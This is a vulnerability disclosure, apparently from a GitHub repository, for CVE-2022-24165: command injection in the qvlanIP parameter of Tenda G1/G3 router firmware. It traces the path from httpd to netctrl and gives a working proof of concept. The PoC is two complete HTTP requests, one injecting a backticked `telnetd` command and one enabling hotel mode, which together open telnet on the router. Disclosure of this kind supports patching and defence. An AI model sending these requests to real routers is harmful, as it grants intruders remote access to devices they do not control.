Headline
CVE-2022-24165: my_vuln/38.md at main · pjqwudi/my_vuln
Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetQvlanList. This vulnerability allows attackers to execute arbitrary commands via the qvlanIP parameter.
Tenda Vulnerability
Vendor:Tenda
Product:G1、G3
Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In httpd
binary:
In formSetQvlanList
function, qvlanIP
is directly passed by the attacker, so we can control the qvlanIP
to attack the OS.
First, make corresponding settings according to the selected network mode. This vulnerability occurs in the formSetHotelMode
function. We mainly explain the data flow of this part.
This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.It should be noted that here you need to ensure that the value of wans.policy.type
is 0.
In netctrl
binary:
In advance_set_hotel_mode_cfg
function, the initial input will be extracted and cause command injection.
Where does the value of pVlanCfg->Cfg[ida].vlanIp
come from?
In advance_get_vlan_base_cfg
function
Where does the value of vlan.tag.list%d
come from?
In httpd
binary:
In formSetQvlanList
function
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
Vulnerability trigger steps:
- set
qvlanIP
=telent
, in (formSetQvlanList
) - set hotel mode, in (
formSetHotelMode
)
PoC
set qvlanIP
=telent
, in (formSetQvlanList
)
POST /goform/setQvlanList HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 140 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/network/vlanSet.html?0.8356422902255819 Cookie: _:USERNAME:_=; G3v3_user=
qvlanIndex=0&qvlanAction=add&qvlanPhyPort=1&qvlanEn=true&qvlanId=10&qvlanName=pjqwudi&qvlanIP=`telnetd`&qvlanMask=255.255.255.0&qvlanRemark=
set hotel mode, in (formSetHotelMode
)
POST /goform/setHotelModeInfo HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 16 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/network/plugAndPlay.html?0.7948986057914317 Cookie: _:USERNAME:_=; G3v3_user=
hotelModeEn=true
Result
The target router has enabled the telnet service.